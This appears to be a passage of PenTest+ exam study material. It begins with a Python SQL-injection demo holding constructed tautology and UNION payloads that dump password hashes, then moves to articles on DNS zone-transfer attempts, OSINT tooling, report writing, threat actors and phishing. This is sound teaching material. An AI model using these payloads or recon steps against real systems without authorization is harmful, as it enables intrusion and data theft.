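def product_safe(conn: sqlite3.Connection, product_id: str) -> List[Row]:
    """Hardened form: validate the type, then bind the value as a parameter so
    the database only ever sees it as data. Binding alone would already defuse
    the payloads below; the int() check rejects junk before it reaches the DB."""
    try:
        pid = int(product_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, name, price FROM product WHERE id = ?", (pid,)).fetchall()


def looks_injectable(conn: sqlite3.Connection,
                     page: Callable[[sqlite3.Connection, str], List[Row]]) -> bool:
    """Boolean-based detection in the style of sqlmap: if 'id=5 AND 1=1' gives the
    same result as the baseline 'id=5' while 'id=5 AND 1=2' gives a different one,
    the parameter is being evaluated as SQL. (sqlmap also uses error-, UNION- and
    time-based probes; this is only the simplest of them.)"""
    baseline = page(conn, "5")
    return page(conn, "5 AND 1=1") == baseline and page(conn, "5 AND 1=2") != baseline


# sqlmap-style payloads (constructed): a tautology and a UNION that reads another table
TAUTOLOGY = "5 OR 1=1"
UNION_DUMP = "0 UNION SELECT id, username, password_hash FROM users"


def demo() -> dict:
    conn = make_db()
    return {
        "normal": product_vulnerable(conn, "5"),
        "tautology_rows": len(product_vulnerable(conn, TAUTOLOGY)),   # every product
        "union_dump": product_vulnerable(conn, UNION_DUMP),            # admin's hash
        "safe_tautology": product_safe(conn, TAUTOLOGY),               # nothing
        "vulnerable_detected": looks_injectable(conn, product_vulnerable),
        "safe_detected": looks_injectable(conn, product_safe),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The UNION payload only works because the attacker guessed a column count that matches the original SELECT; sqlmap automates exactly that guessing, which is why a single unparameterised lookup is enough to dump unrelated tables.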

Active Information Gathering for Pentesting

Article / Updated 03-22-2021

Active information gathering for a pentest involves polling the target systems to find out about the systems that are up and running, the ports that are open, and the software being used. This involves communicating with the systems and potentially being detected. For the PenTest+ certification exam, remember the difference between active and passive information gathering. Active information gathering involves engaging with the target environment, such as via scans, while passive information gathering involves using public internet resources to discover information about the target without being detected.

Many of the active information gathering techniques involve scanning target systems to find out things like the operating system that is running and the services running on the system. Domain name system (DNS) profiling involves sending queries to DNS servers to retrieve information on the systems that might exist within the company, such as a mail server or a web server. Keep in mind that in passive information gathering you were able to obtain the DNS server information for a company by doing a Whois lookup. The next step is to send queries to those servers to find out what DNS records exist. You can use a number of tools to perform DNS profiling. The two most common are the commands nslookup and dig.

nslookup

nslookup is a TCP/IP command in Windows and Linux that allows you to query DNS servers for different types of DNS records. You can use nslookup as a command or as an interactive prompt where you type nslookup commands into the prompt. Here is an example of using nslookup as a regular command to retrieve the internet protocol (IP) address of a host:

    nslookup www.wiley.com

In the following figure, you can see the address of the DNS server you have sent the query to at the top of the output, and at the bottom of the output, you can see the IP addresses of the fully qualified domain name (FQDN) of www.wiley.com. In this example, four IP addresses are returned for the FQDN.

With nslookup you can also do things like specify that you want to see the email servers for a company by setting the type of query to MX (mail exchange) records. To do this, use the following commands:

    nslookup
    set type=MX
    wiley.com

In the following figure, you can see the output of the command. It looks like wiley.com has four mail servers. When performing the pentest, you would document the four FQDNs of the mail servers and then resolve those to IP addresses by using nslookup <fqdn>.

As one final example, you can try to retrieve all of the DNS records for a particular company by doing a DNS zone transfer. DNS zone transfers should be controlled by the server administrators, so if you are successful, you definitely want to make a note of it and add it to your remediation list in the pentest report. To attempt a zone transfer from Windows using nslookup, use these commands:

    nslookup
    server <ip_or_fqdn_of_company_DNS_server>
    set type=all
    ls -d <company_domainname>

Keep in mind you would have retrieved the DNS server information from the Whois lookup you performed during your passive information gathering earlier. Pretending the DNS server is 192.168.1.1 for wiley.com (which it is not), you could use the following commands to do a zone transfer:

    nslookup
    server 192.168.1.1
    set type=all
    ls -d wiley.com

dig

dig, which is short for Domain Information Groper, is a command in Linux used to perform DNS profiling. I like the output of dig a bit better than the output of nslookup because I think it's easier to read. To find out the IP address of www.wiley.com, type the following command on a Kali Linux machine:

    dig www.wiley.com

Notice in this figure that the question section is seeking information about the IP address of www.wiley.com, and the answer section is listing the four IP addresses associated with it.

What I like about dig as a command is that you can ask for the short version of the output by adding +short to the command. For example:

    dig www.wiley.com +short

Notice that the output in the following figure is much cleaner than the output shown in the preceding figure, and the IP addresses stand out right away. If you want to use dig to retrieve specific records, such as MX records to find out the email servers for a company, you could use the following command:

    dig wiley.com MX

You could also clean up the output by adding +short to that command:

    dig wiley.com MX +short

This figure displays the output of using dig to find the MX records. If you want to do a zone transfer with dig to attempt to retrieve all of the DNS records that exist, you could use the following dig command:

    dig wiley.com axfr

You may notice that you do get a few records that identify the DNS servers for the company (NS) and also a few host records (A); however, you may also notice that at the bottom of the output it says “Transfer failed.” This is because the server administrators for that company are blocking full zone transfers, as a zone transfer exposes too much information to the hacker. If you are testing a company and zone transfers are not refused, you want to be sure to document that in your pentest report. For the PenTest+ certification exam, know that dig and nslookup are two tools that can be used to perform DNS profiling to help identify hosts that exist within an organization.
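The dig output described above, parsed so that the MX targets and the outcome of an axfr attempt can be recorded in the report, or so an administrator can confirm that their own name servers refuse zone transfers. This is an added example, not code from the article; the sample outputs, hostnames and addresses are constructed placeholders, and the format assumed is dig's normal one-record-per-line answer section.

```python
"""Parse dig output so DNS profiling results (MX targets, whether a zone
transfer was refused) can be recorded, or so an administrator can confirm
that their own servers refuse AXFR. Added example, not code from the
original article; the sample outputs are constructed placeholders."""
import subprocess
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class DnsRecord:
    name: str   # owner name, e.g. "example.com."
    ttl: int
    rtype: str  # record type: "A", "MX", "NS", "SOA", ...
    rdata: str  # rest of the line, e.g. "10 mail1.example.com."


def parse_dig(text: str) -> List[DnsRecord]:
    """Turn the resource-record lines of dig output into DnsRecord objects.

    dig prints one record per line as: <name> <ttl> IN <type> <rdata>.
    Lines starting with ';' are comments (header, QUESTION section, and
    status notes such as '; Transfer failed.') and are skipped.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(None, 4)
        if len(parts) != 5 or parts[2] != "IN":
            continue  # not a resource-record line
        name, ttl, _cls, rtype, rdata = parts
        records.append(DnsRecord(name, int(ttl), rtype, rdata))
    return records


def mail_servers(text: str) -> List[str]:
    """Return MX targets ordered by preference (lowest number first),
    the list you would then resolve to IP addresses one by one."""
    mx = [r for r in parse_dig(text) if r.rtype == "MX"]
    mx.sort(key=lambda r: int(r.rdata.split()[0]))
    return [r.rdata.split()[1] for r in mx]


def zone_transfer_allowed(text: str) -> bool:
    """A completed AXFR is bracketed by SOA records and carries no
    'Transfer failed.' note; a refused one prints that note even though
    dig may still show a few NS and A records it fetched beforehand."""
    if "Transfer failed" in text:
        return False
    return any(r.rtype == "SOA" for r in parse_dig(text))


def run_dig(name: str, rtype: str = "A", server: Optional[str] = None) -> str:
    """Run the real dig binary (needs network and dig installed); only
    called from main(), so the parsing above stays testable offline."""
    cmd = ["dig"] + ([f"@{server}"] if server else []) + [name, rtype]
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


# Constructed sample of 'dig example.com MX' (not real records).
SAMPLE_MX = """\
; <<>> DiG 9.16.1 <<>> example.com MX
;; QUESTION SECTION:
;example.com.\t\t\tIN\tMX

;; ANSWER SECTION:
example.com.\t300\tIN\tMX\t20 mail2.example.com.
example.com.\t300\tIN\tMX\t10 mail1.example.com.
"""

# Constructed sample of a refused 'dig example.com axfr'.
SAMPLE_AXFR_REFUSED = """\
; <<>> DiG 9.16.1 <<>> example.com axfr
example.com.\t300\tIN\tNS\tns1.example.com.
www.example.com.\t300\tIN\tA\t192.0.2.10
; Transfer failed.
"""

# Constructed sample of a zone transfer that should have been refused.
SAMPLE_AXFR_OPEN = """\
example.com.\t300\tIN\tSOA\tns1.example.com. hostmaster.example.com. 1 3600 900 604800 300
example.com.\t300\tIN\tNS\tns1.example.com.
mail1.example.com.\t300\tIN\tA\t192.0.2.25
example.com.\t300\tIN\tSOA\tns1.example.com. hostmaster.example.com. 1 3600 900 604800 300
"""


def main() -> None:
    # Offline demonstration on the constructed samples; swap in
    # run_dig("example.com", "axfr", server="ns1.example.com") for a live check.
    print("MX targets:", mail_servers(SAMPLE_MX))
    print("refused sample allows AXFR:", zone_transfer_allowed(SAMPLE_AXFR_REFUSED))
    print("open sample allows AXFR:", zone_transfer_allowed(SAMPLE_AXFR_OPEN))


if __name__ == "__main__":
    main()
```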

Passive Information Gathering for Pentesting

Article / Updated 03-22-2021

When you are conducting a penetration test, it is important to take a methodical approach to information gathering and divide the task up into two parts: passive information gathering and active information gathering. Passive information gathering should come first. It involves collecting public information from the internet about the company being assessed — without invoking any kind of communication with the target systems. Passive information gathering involves using internet resources to find out publicly available information about the company that could help you exploit the company’s systems and bypass security controls while performing the pentest. There are different techniques for passive information gathering: you could surf public internet sites manually, query DNS, or use open-source intelligence (OSINT) gathering tools to automate the discovery of information. Most of these techniques are not technical in nature, but they do represent the mindset of a hacker, so you want to follow similar strategies when performing your pentest.

Open-source intelligence gathering

The term used for discovering information from public data sources available on the internet is open-source intelligence (OSINT) gathering. Through OSINT gathering, you can collect information about a company from the company’s website, social media sites, domain name system (DNS) information, blogs, and so on. The goal of OSINT gathering is to gather information such as contact names, email addresses, and DNS records to aid in the penetration test.

Browsing internet resources

The first technique to use when information gathering is to surf the company website for information that could aid in an attack, such as software the company is using or email addresses and phone numbers of company employees that you could use in a social engineering attack. Look for web pages, such as About Us, Job Postings or Careers pages, that could offer information like names, phone numbers, and email addresses of employees or upper management. This is great information to use in a social engineering attack. In addition, a Job Postings or Careers page may list active jobs that could help you understand the technologies the company is using. For example, if the company is looking for an Exchange Server 2016 Messaging Administrator, then you know the company is most likely running Exchange Server 2016. For the PenTest+ certification exam, know that you can use tools such as the popular wget in Linux or the BlackWidow utility for Windows to copy the contents of a website to a local folder on your system so that you can leisurely review the contents offline.

Using Google hacking

Google hacking is the term used for an information gathering technique in which specific keywords are used to search Google or other search engines for specific information on the internet. Here are a few of the Google keywords you should be familiar with that I find quite useful:

site: The site keyword is used to search a specific website for a keyword. For example, if you are performing a security test for the Wiley publishing company, you could use site: www.wiley.com password to locate the login pages on the Wiley website. This could be useful if you wanted to test Wiley’s login pages against SQL injection attacks.

intitle: You can use the intitle keyword to search the title of a page for specific keywords. For example, if you want to find web pages that contain the word “intranet” in the title, you could use intitle: intranet.

inurl: The inurl operator will search for the keyword given in the URLs found in the Google database. For example, if you want to locate sites that have the word “intranet” in the URL, you could use inurl: intranet.

intext: The intext operator searches a web page for specific text. For example, if you want to search my company site for pages that contain the word “video,” you could use site: dcatt.ca intext: video.

filetype: One of my personal favorites is the filetype operator, which you can use to find results containing a specific file type. For example, you could search the internet for sample penetration reports by filetype: pdf penetration test report.

Referencing online cybersecurity sources

In addition to browsing internet resources and using Google hacking to conduct your passive information gathering, research from many official sources is available for OSINT gathering, especially in the realm of cybersecurity information. You should be familiar with the following sources of cybersecurity information for the PenTest+ certification exam:

CERT: Short for Computer Emergency Response Team, there are many CERT groups available worldwide that share cybersecurity information. Example CERT groups are the US CERT group and the Canadian version.

JPCERT: The PenTest+ certification exam makes special mention of JPCERT, which is the Japan CERT group used to share information on cybersecurity. You can visit the JPCERT

NIST: The National Institute of Standards and Technology (NIST) is a standards organization that develops a number of documents related to cybersecurity known as special publication (SP) documents. For example, SP 800-115 is a guide to security testing and assessments, while SP 800-17 is a guide to risk management. There are a number of SP documents well worth reading.

CAPEC: The Common Attack Pattern Enumeration and Classification (CAPEC) is an information resource provided by a company called MITRE that identifies and documents attack patterns. The MITRE site also provides information on mitigation techniques for the attacks.

Full disclosure: You can subscribe to mailing lists that share information related to vulnerabilities and exploitation techniques, known as full disclosure lists.

CVE: The Common Vulnerabilities and Exposures (CVE) list is responsible for identifying known vulnerabilities by their name, number, and description.

CWE: The Common Weakness Enumeration (CWE) list is a list of common weaknesses found in software and the mitigation techniques used to protect against those weaknesses.

Passive information-gathering tools

In addition to using Google or surfing the company website, you can use a number of passive OSINT tools to help collect such company information as contact names, email addresses, DNS information, and internet protocol (IP) addresses.

Whois

Whois is a widely used database search tool used to discover domain name information and IP address information about a company. The domain name information sometimes contains important contact information of senior IT professionals that you can use in a social engineering attack, while the IP information is the public IP addresses purchased by the company. Having this information handy will aid in the next phase of the pentest — discovering active hosts. A number of Whois databases that you can search are available online. For example, you could go to www.godaddy.com/whois to perform a search, or you could go to www.networksolutions.com/whois, which is shown in the following figure. What is cool about the Network Solutions search page is that you can search by domain name or IP address. Note that with the Whois lookup, you can collect information like the organization’s name, the DNS servers hosting the DNS data, and sometimes contact information, such as email addresses and phone numbers of company employees. Many people are now using private registration with their domain registration information, which helps protect personal information by obfuscating the information that is displayed with Whois lookups. You can also use Whois programs to discover domain name and IP address information. For example, Kali Linux comes with a Whois program you can execute from a terminal with the following command:

    whois wiley.com

Another site with detailed Whois information is ARIN. When search results come back, choose the handle. You can then see the public IP addresses that are used by that organization.

theHarvester

theHarvester is a program in Kali Linux that you can use to perform passive information gathering to collect information such as employee names, email addresses, and subdomains, and to discover hosts owned by the organization. You can use it to collect public information from Google, LinkedIn, Twitter, and Bing. The following command searches LinkedIn users for Wiley:

    theharvester -d wiley.com -b linkedin

To collect information from all sources such as Google, LinkedIn, and Twitter, use the following command:

    theharvester -d wiley.com -b all -l 100

In this example, shown in the following figure, I limited the results to 100.

Shodan

Shodan is a search engine that collects information about systems connected to the internet, such as servers and internet of things (IoT) devices. To use Shodan, you need to register with a free account, and then you can search for the company or organization being assessed. When you perform a search in Shodan, you get a list of the target company’s publicly available servers and devices along with the IP address, the services running, and the ports that are open on that system. When you view the details for that system, you can get a list of its vulnerabilities. A map view shows the physical location of those servers as well.

Maltego

Maltego is OSINT software that shows a graphical representation of relationships between people, groups, webpages, and domains by analyzing online resources like Facebook, Twitter, DNS, and Whois information. For example, you could create a graphic and add a website address to the graphic, then use Maltego to search for additional information. This could be Whois information, phone numbers, location information, and email addresses associated with that website, and then you can have them added to the graph.

Recon-ng

Recon-ng is an OSINT tool built into Kali Linux that allows you to retrieve information like contact names, email addresses, DNS information, IP address information, and the like. Recon-ng is not as easy to use as theHarvester because it uses the module concept similar to the Metasploit framework, a modular penetration testing platform based on Ruby. Let’s take a look at an example of Recon-ng you can use on Kali Linux. To start Recon-ng and add a workspace, use the following commands (a workspace represents a project you are working on):

    recon-ng
    workspaces add wiley

Now let’s add the domain names and company names to the Recon-ng database tables so that it uses them when performing all of the information gathering with future commands we use:

    add domains wiley.com
    add domains www.wiley.com
    add domains dummies.com
    add domains www.dummies.com
    add companies Wiley~A publishing company
    add companies Wiley Publishing~A publishing company
    add companies ForDummies~A Wiley product line

To view the domains and company tables that have been populated, use these commands:

    show companies
    show domains

The Recon-ng tool has modules that you use to collect the different types of information from online resources. Next, let’s collect the points of contact from Whois databases:

    use recon/domains-contacts/whois_pocs
    run

Now, let’s discover other domain names and hosts on the internet related to the company by using a Bing search and a Google search:

    use recon/domains-hosts/bing_domain_web
    run
    use recon/domains-hosts/google_site_web
    run

After running these commands, you can see the contact names and email addresses listed in the terminal, but it would be nice to output the information to a web page that you could use for a report. The following commands will load the reporting module and specify the creator of the report, the customer, and the report filename to generate:

    use reporting/html
    set CREATOR 'Glen E. Clarke'
    set CUSTOMER 'Wiley Publishing'
    set FILENAME /root/Desktop/Wiley_recon.html
    run

If you open the HTML file on your desktop by double-clicking it, you will see a report similar to the report shown in the following figure. Keep in mind that if we had used other modules to collect additional information (such as the IP ranges), that information would have been included in the report as well. Again, this is just a small example; know that there are a number of recon-ng modules that enable you to do things like view social media posts by an IP address.

Censys

Censys is another browser-based search engine that identifies hosts on the internet for a particular organization. In addition to identifying the hosts, Censys will also identify the services and ports that are open on those systems.

FOCA

Fingerprinting Organizations with Collected Archives (FOCA) is a tool used to scan documents to collect metadata that is typically hidden from the user. Some examples of document types that can be scanned by FOCA to extract the metadata are Microsoft Office files, Open Office files, and PDF files. For the PenTest+ certification exam, remember that Whois, theHarvester, Maltego, Recon-ng, and Censys are all tools used for OSINT gathering.

How to Write and Handle the Pentest Report

Article / Updated 03-22-2021

For the PenTest+ certification exam, you are expected to have an understanding of the basics of pentest report writing, including familiarity with the different sections of the report, what goes into the report, and how to securely store and transmit the report. At the completion of a pentest, the pentest report is a valuable asset for a business. Not only will the report contain a list of vulnerabilities that need to be fixed and remediation steps to follow to reduce the vulnerabilities, but it will also discuss the methodology that was followed for the current engagement and can act as a guide for future penetration tests. Before jumping into the structure of the report, let’s discuss two important concepts of pentest reports: normalization of data and risk appetite.

Normalization of data

It is important that you document your steps during the penetration test so that you can include them in your penetration report. You should also take screenshots during the penetration test so that you can include the screenshots within the pentest report as well. You also should normalize results so that they are all based on the same scale. For example, some testing tools may use a scale from 1 to 10, while others may use a scale of 1 to 8. You will need to convert the results based on a scale of 1 to 8 to be out of 10 so that all results are normalized and based on the same scale. Also, some tools may report the value of 1 as being bad and 10 as good, while another tool may report 1 as a good value and 10 as a bad value. In this case, you will need to normalize the data by reversing the scale so that all the data can be plotted on the same chart in the pentest report.

Risk appetite

Risk appetite refers to the level of risk an organization is willing to accept. It is important to understand the organization’s risk appetite because you will need to prioritize the pentest results and provide remediation steps to the customer based on the organization’s tolerance of risk. The recommendations on remediation steps will stem from the results of the vulnerability scan and exploitation, but should also align with the company’s risk appetite. The risk appetite will depend on the function of the organization; for example, if it is an organization that affects public safety, then the risk appetite (tolerance) will be low.

Report structure

It is important to remember that the purpose of the penetration test report is to report on the findings of the pentest and give remediation steps on how to better secure the environment and reduce the risk of attack. The pentest report is a written report of findings and remediation steps that should include the sections outlined here.

Title page and table of contents

The title page for the report should contain a title for the report, such as “White Box Penetration Testing for Company ABC,” and the name of the company or person who performed the pentest and authored the report. The title page should also show a version number and date for the report. After the title page, the report should include a table of contents that specifies the page references for each of the other parts of the report.

Executive summary

The executive summary is a summary of the pentest for upper-level management or the executive team. It is typically written after the rest of the report has been written. The executive summary contains key information regarding the pentest that you would like to communicate to the executive team, such as the methodology used, the key tasks performed, and a high-level overview of your findings and recommendations.

Methodology

The methodology section of the report outlines the types of testing performed during the penetration test, the steps taken during each phase, and how the attacks were carried out. The methodology section also discusses the process used to identify and rate the risks for each vulnerability found and what tools were used by the pentesters. Within the methodology section you should also discuss the metrics and measures used to identify the risk rating for each of the vulnerabilities found during the assessment. For example, you could explain in the risk rating methodology that you are calculating risk by assigning a probability of low, medium, or high to each vulnerability and then assigning an impact of low, medium, or high to each vulnerability. Low has a value of 1, medium has a value of 2, and high has a value of 3. You can then calculate risk with the following formula:

    Risk = probability * impact

You can then display a graphic outlining the scores for low risk (in my example it will be scores from 1 to 3), medium risk (scores 4 to 6), and high or critical risk (scores 7 to 9) as shown. Again, this is just an example. You can go with a 4- or 5-number scale for each category of probability and impact, which will give you a bit more variance in the risk rating scores. It is important to show how the risk scores are calculated, and to use graphics in your report to help the reader relate to the results. Having a legend showing that low is green, medium is orange, and high or critical is red is also important, as you can use those colors in your findings to draw out critical vulnerabilities.

Findings and remediation

The findings and remediation section of the report is used to discuss the security issues found and the remediation steps to take to fix each security issue. Each security issue should have a paragraph or two describing the security issue and a paragraph describing the remediation steps. For example:

    Vulnerability Finding 1: Weak passwords used by user accounts
    Impact: High
    Likelihood: Medium
    Risk Rating: 6
    Description: While assessing passwords on the network, it was found that many user accounts are using weak passwords made up of words found in the dictionary. These passwords were easily cracked by the John the Ripper tool.
    Remediation: It is recommended that password policies are configured to enforce complex passwords, lock out an account after three failed log-on attempts, keep a password history of 12 passwords, and require passwords to change every 60 days.

Conclusion

The conclusion is the last section in the report and should summarize the results as well as identify any parts of a typical penetration test that were not included in the assessment that the company may want to do in the future. For example, if social engineering was not part of the scope of the penetration test, you could recommend the organization perform social engineering during the next penetration test. In the conclusion of the report, you should also give the organization an overall risk score so that it can compare this result to the overall risk score of future penetration tests. The goal would be to see this risk score get lower with each penetration test.

Secure handling and disposition of reports

The penetration testing report contains a lot of sensitive information about an organization, such as Internet Protocol (IP) addresses of different systems, vulnerabilities that exist for the different systems, and the steps taken to exploit those vulnerabilities. This information is worth gold to a hacker, so you want to be sure to protect and control access to the report.

Format

The first point to make about keeping the report secure is that you must store penetration testing reports in an encrypted format to ensure that the information is kept confidential, and there should be a limited number of people who have access to the report. Any hard copies of the report should be kept in a secure location for an agreed-upon time. For the PenTest+ certification exam, remember that the pentest report should always be encrypted, both in storage and in transit.

Storage time

The second point to remember about keeping the report secure is how long the report is stored. The original pentest agreement should specify how long the pentesting organization has a copy of the report in its possession — and it must be stored in a secure location. The purpose for the pentesting organization to hold on to a copy of the report is to be able to answer questions from the customer related to the penetration test. Once the report is no longer needed, the pentest company should securely delete the digital copies and shred the hard copies.
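The normalization and risk-rating methodology described in this article, carried through in code: tool scores on different (or reversed) scales are mapped onto one scale, each finding is rated with Risk = probability * impact, and the 1-3 / 4-6 / 7-9 bands and their legend colors are applied, with the same thirds rule extended to the 4- and 5-point scales the text mentions. This is an added example, not code from the article; the tool scores, the second and third findings, and the definition of the overall risk score (a mean of the finding ratings) are constructed assumptions.

```python
"""Normalise tool scores onto one scale and rate findings with
risk = probability * impact, using the report methodology above.
Added example, not code from the original article; the tool scores,
extra findings and the overall-risk definition are constructed assumptions."""
from dataclasses import dataclass
from typing import List, Union

LEVELS = {"low": 1, "medium": 2, "high": 3}   # the 1/2/3 values from the text
COLOURS = {"low": "green", "medium": "orange", "high": "red"}   # report legend


def normalize_score(value: float, src_min: float, src_max: float,
                    dst_min: float = 1, dst_max: float = 10,
                    reverse: bool = False) -> float:
    """Map a score from one tool's scale [src_min, src_max] onto the
    report's scale [dst_min, dst_max] (1 to 10 by default).

    reverse=True flips a tool whose scale runs the other way (1 = bad,
    10 = good) so that a higher number always means worse."""
    if not src_min <= value <= src_max:
        raise ValueError(f"{value} is outside the scale {src_min}-{src_max}")
    fraction = (value - src_min) / (src_max - src_min)
    if reverse:
        fraction = 1 - fraction
    return round(dst_min + fraction * (dst_max - dst_min), 2)


def level_value(level: Union[str, int]) -> int:
    """Accept 'low'/'medium'/'high' or an integer from a 4- or 5-point scale."""
    return LEVELS[level.lower()] if isinstance(level, str) else int(level)


def risk_score(probability: Union[str, int], impact: Union[str, int]) -> int:
    """Risk = probability * impact."""
    return level_value(probability) * level_value(impact)


def risk_band(score: int, levels: int = 3) -> str:
    """Split the 1..levels^2 range into thirds: with 3 levels that is
    1-3 low, 4-6 medium, 7-9 high/critical. The same thirds of 16 or 25
    are used for the 4- and 5-point scales (an assumption)."""
    top = levels * levels
    if not 1 <= score <= top:
        raise ValueError(f"{score} is outside 1-{top}")
    if score <= top // 3:
        return "low"
    if score <= 2 * top // 3:
        return "medium"
    return "high"


@dataclass
class Finding:
    title: str
    impact: str
    likelihood: str
    description: str
    remediation: str

    @property
    def rating(self) -> int:
        return risk_score(self.likelihood, self.impact)

    @property
    def band(self) -> str:
        return risk_band(self.rating)

    def render(self) -> str:
        """Text block in the shape the findings section uses."""
        return (f"{self.title}\nImpact: {self.impact}\nLikelihood: {self.likelihood}\n"
                f"Risk Rating: {self.rating} ({self.band}, {COLOURS[self.band]})\n"
                f"Description: {self.description}\nRemediation: {self.remediation}")


def prioritize(findings: List[Finding]) -> List[Finding]:
    """Highest risk first, the order the findings section should present them."""
    return sorted(findings, key=lambda f: f.rating, reverse=True)


def overall_risk(findings: List[Finding]) -> float:
    """Assumed definition: mean rating across findings, kept so the next
    engagement can be compared (the text asks for a score but gives no formula)."""
    return round(sum(f.rating for f in findings) / len(findings), 2) if findings else 0.0


# Constructed findings; the first one mirrors the example in the text.
FINDINGS = [
    Finding("Vulnerability Finding 1: Weak passwords used by user accounts",
            impact="High", likelihood="Medium",
            description="Many accounts use dictionary words that were easily cracked.",
            remediation="Enforce complex passwords, lock out after three failed log-ons, "
                        "keep a 12-password history, change passwords every 60 days."),
    Finding("Vulnerability Finding 2: Unpatched web server (constructed)", impact="High",
            likelihood="High", description="Constructed.", remediation="Apply vendor patches."),
    Finding("Vulnerability Finding 3: Verbose service banner (constructed)", impact="Low",
            likelihood="Medium", description="Constructed.", remediation="Suppress version."),
]

if __name__ == "__main__":
    # Two constructed tools: one scored 1-8, one scored 1-10 with 10 = good.
    print("tool A 6/8 ->", normalize_score(6, 1, 8))
    print("tool B 3/10 (reversed) ->", normalize_score(3, 1, 10, reverse=True))
    for finding in prioritize(FINDINGS):
        print(finding.render(), "\n")
    print("Overall risk score:", overall_risk(FINDINGS))
```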

Penetration Testing Terminology

Article / Updated 03-22-2021

Take a look at some penetration testing terminology you need to be familiar with for the CompTIA PenTest+ certification exam.

Types of assessments

The CompTIA PenTest+ certification objectives reference some key terms in regard to the different types of assessments that can be performed. The following are some common types of pentest assessments:

Goals-based/objectives-based: This type of assessment is focused on a specific purpose. For example, you may have installed a new server or piece of software and want to test that specific asset for security flaws. Some examples of goals for goal-based assessments are that the company may want to assess the security of only the wireless network, or maybe only perform social engineering attacks to test the effectiveness of the security education program with the employees. Another common goal may be simply to test the security of a public website or web application.

Compliance-based: A compliance-based assessment is an assessment that is driven by standards and regulations. With compliance-based assessments, you must follow a standard assessment methodology, such as the National Institute of Standards and Technology’s (NIST’s) SP800-15 series of guidelines, or the PCI DSS from the PCI Security Standards Council.

Red team/blue team: The term red team refers to the internal team of professionals performing a penetration test acting as hackers. With a red team test, you are not as focused on reporting and remediation steps after the fact; you are more focused on trying to bypass security controls and determining how your security team will respond to the attack. The security team responsible for defending against attacks is known as the blue team.

Pentest strategies

You can follow several different strategies when performing a penetration test. You can go with a black box test, a white box test, or a gray box test:

Black box: In a black box penetration test, the testers are given zero information about the environment and the targets. The goal of the black box test is to treat the pentesters as if they are hackers — they have to discover the environment before they can attack the environment. In a black box test, you would not share Internet Protocol (IP) address information, network infrastructure details, or public services on the internet, such as websites, domain name system (DNS), or file transfer protocol (FTP) servers. It is up to the penetration testers to discover all assets and then try to exploit those assets.

White box: In a white box penetration test, the testers are given all of the details of your network environment, including server configurations and the services they run, a network diagram showing different network segments and applications, and IP address information.

Gray box: In a gray box penetration test, a limited amount of information is given to the penetration testers, such as the IP ranges being used by the company or addresses of your public internet servers. With this information, the pentesters will discover what services are running on each system and then try to exploit those systems.

For the PenTest+ certification exam, remember the different pentest strategies. Black box is when no details about the target are given, white box is when all known information about the targets is given to testers, and gray box testing is when limited information such as IP addresses or server names is given to keep the pentest focused on those targets.

Threat actors and threat models

The purpose of penetration testing is to simulate attacks that could occur in real life. A big part of information security — and something all security professionals should be aware of — is who you are protecting against. Who would attack your network or website?

Capabilities and intent

Before we look at the types of hackers and threat models, it is important to understand the different levels of hacking capabilities for each type of hacker, or threat actor, and the different motives, or intent, for hacking. The capabilities of a hacker will vary depending on the type of threat actor the hacker is and the types of attacks being performed. Some attacks are basic in nature, so you may find that all types of hackers can perform these attacks, while more sophisticated attacks are performed by hackers with more detailed knowledge of the underlying technologies being hacked, their vulnerabilities, and how to exploit those vulnerabilities. A hacker may be motivated to hack for many reasons, such as for financial gain (for example, hacking into bank accounts or selling sensitive data that was obtained in the hack) or for the fame or notoriety that is earned by hacking into a big-name company. A hacker may also be motivated by a personal cause or a group cause, as is the case with terrorists or activists.

Threat actor

A threat actor is a person or entity that causes the threat against your assets. When it comes to hacking, you should be aware of some common threat actors:

Script kiddies: A script kiddie is a person who does not necessarily have much background on how attacks work; they simply run some automated tools to try to exploit systems. Their intent is typically the challenge, and also bragging rights.

Hacktivist: A hacktivist is a person who hacks for a cause, such as for political purposes or for social change. The capabilities of the hacktivist can range from basic to advanced hacking knowledge, as is the case with the infamous hacking group called “Anonymous.”

Insider threat: Insider threats are threats from inside your organization or inside your network. These can be very serious threats of malicious destruction from a disgruntled employee or even innocent mistakes made by other employees.

APT: An Advanced Persistent Threat (APT) is an advanced hacking process, such as one found in a nation-state–sponsored group or person that gains unauthorized access to a network for political or economic reasons. The attack typically aims to keep unauthorized access for a long period of time, such as many months, by planting malicious software on the system that will monitor activity, collect sensitive data, or damage the system. APT also includes advanced hacks on financial institutions, defense contractors, and software companies, such as Twitter or Facebook, which would contain a wealth of sensitive information the hacker would like to collect.

Adversary tier

Threat actors are typically identified in an adversary tier that ranks the threat actors by their capabilities and the damage they can perform. The threat actors discussed earlier are ranked based on their threat level and capabilities, as follows (1=low, 4=high):

1. Script kiddie
2. Insider threat
3. Hacktivist
4. APT

This figure summarizes the adversary tier, with script kiddies at the bottom of the skillset and APT at the top.

Threat modeling

Penetration testing typically involves an exercise known as threat modeling. Threat modeling refers to the act of documenting company assets and then defining the types of attacks or threats against those assets. The threats are then assigned a likelihood (the chances the attack will happen) and an impact (how serious the result of the attack is if it is successful) so that the threats can be prioritized. Based on the priority of the threats, security professionals put security controls in place to prevent those threats from occurring or to minimize the impact.

What Is Social Engineering?

Article / Updated 03-22-2021

Social engineering from a security standpoint refers to the deliberate use of deception to trick a user into compromising system security through social contact such as an email message, a text message, or a phone call. Social engineering attacks are a common way to test the effectiveness of a company’s security education program. If the rules of engagement and scope of the penetration test support social engineering attacks, you should plan for them in the penetration test.

There are different types of social engineering attacks, such as phishing, shoulder surfing, and USB key drop, among others. Take a look at the different types of social engineering.

Phishing

Phishing is a type of social engineering attack in which the hacker sends an email message to a user with the hope that the user will click hyperlinks within the message. These hyperlinks lead to malicious websites that collect information from the user. For example, a hacker may send an email message that appears to be from the user’s bank, and links within the message take the user to a site that looks like the bank’s site. Because the site looks familiar, the user may feel comfortable supplying his or her account information, not knowing it is a fake bank site. All the while, the hacker is collecting the information typed into the fake site.

With a regular phishing attack, the hacker sends the email message to a pool of email addresses the hacker was able to discover, without much thought to who receives it. When you do a penetration test, you can do the same: collect a batch of email addresses for the target organization and then email all of the addresses to see if someone goes to the fake site.

Phishing attacks occur in the following forms:

Spear phishing: A phishing attack that targets a specific person

